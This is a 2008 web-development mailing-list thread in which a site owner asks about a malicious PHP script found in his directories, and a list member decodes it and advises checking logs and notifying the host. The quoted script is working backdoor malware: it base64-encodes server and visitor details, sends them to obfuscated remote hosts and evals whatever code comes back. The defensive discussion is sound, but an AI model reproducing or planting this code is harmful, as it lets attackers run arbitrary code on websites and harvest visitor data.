Wow.... Thanks Sheila.
This script was loaded into many directories, some of which did not start out writeable. Could someone have changed all my permissions and then insert this? What kind of hidden links should I look for, and what might they do? :(((( On Jun 17, 2008, at 2:18 PM, Sheila Fenelon wrote: > I decoded some of the strings in the script and found > http://7.rssnews.ws > Googling for 7.rssnews.ws yields this discussion > > http://forums.oscommerce.com/lofiversion/index.php?t301350.html > > It's an OsCommerce forum but I don't think this is necessarily an > OsCommerce problem. You apparently have writable directory > somewhere. The code is used to add hidden links to pages. > > Googling for rssnews.ws provides more links. > > Timestamps and server logs will tell you more about what happened. > If you haven't done so already, you should notify your host. > > > Sheila > > > steve miller wrote: >> Hello... >> I just found a bad script on my website :( >> Can anyone here tell me what they might have stolen? >> Here is the script: >> error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? >> $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER >> ["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c= >> (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : >> $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER >> ["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? >> $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER >> ["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g= >> (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER >> ["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER >> ["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i= >> (isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER >> ["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER >> ["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : >> $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode >> ($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode >> ($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode >> ($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include >> (base64_decode("aHR0cDovLw==").base64_decode >> ("d3d3My5yc3NuZXdzLndz")."/?".$str))){} else if (include >> (base64_decode("aHR0cDovLw==").base64_decode >> ("d3d3My54bWxkYXRhLmluZm8=")."/?".$str));else if >> ($c=file_get_contents(base64_decode >> ("aHR0cDovLzcucnNzbmV3cy53cy8/").$str))eval($c);else{$cu=curl_init >> (base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/").$str);curl_setopt >> ($cu,CURLOPT_RETURNTRANSFER,1);$str=curl_exec($cu);curl_close >> ($cu);eval($str);}; > > > > ____ • The WDVL Discussion List from WDVL.COM • ____ > To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] > dl.sparklist.com or > use the web interface http://e-newsletters.internet.com/ > discussionlists.html/ > Send Your Posts To: [email protected] > To change subscription settings, add a password or view the web > interface: > http://intm-dl.sparklist.com/read/?forum=wdvltalk > > ________________ http://www.wdvl.com _______________________ > > You are currently subscribed to wdvltalk as: [EMAIL PROTECTED] > To unsubscribe send a blank email to > [EMAIL PROTECTED] > To unsubscribe via postal mail, please contact us at: > Jupitermedia Corp. > Attn: Discussion List Management > 475 Park Avenue South > New York, NY 10016 > > Please include the email address which you have been contacted with. > ____ • The WDVL Discussion List from WDVL.COM • ____ To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.internet.com/discussionlists.html/ Send Your Posts To: [email protected] To change subscription settings, add a password or view the web interface: http://intm-dl.sparklist.com/read/?forum=wdvltalk ________________ http://www.wdvl.com _______________________ You are currently subscribed to wdvltalk as: [EMAIL PROTECTED] To unsubscribe send a blank email to [EMAIL PROTECTED] To unsubscribe via postal mail, please contact us at: Jupitermedia Corp. Attn: Discussion List Management 475 Park Avenue South New York, NY 10016 Please include the email address which you have been contacted with.
